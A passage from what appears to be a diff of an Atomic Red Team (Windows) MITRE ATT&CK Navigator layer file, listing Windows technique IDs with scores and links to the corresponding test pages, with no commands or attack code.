team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.0
02/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":10
0,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enab
led":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1187","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcana
ryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/bl
ob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":
"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score"
:100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T
1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},
{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1
552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics
/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1557.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"},{"techniqueID":"T1557","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/maste
r/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/
master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1567","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.
md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1588.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"},{"techniqueID":"T1588","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least 
